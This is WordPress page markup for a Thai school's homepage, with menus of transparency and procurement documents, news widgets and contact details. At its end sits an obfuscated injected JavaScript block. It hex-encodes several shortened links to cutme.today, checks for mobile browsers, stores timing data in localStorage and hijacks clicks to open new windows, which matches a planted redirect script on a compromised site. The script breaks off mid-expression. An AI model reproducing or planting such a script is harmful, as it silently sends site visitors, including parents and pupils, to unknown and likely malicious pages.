200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 045-660157</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| 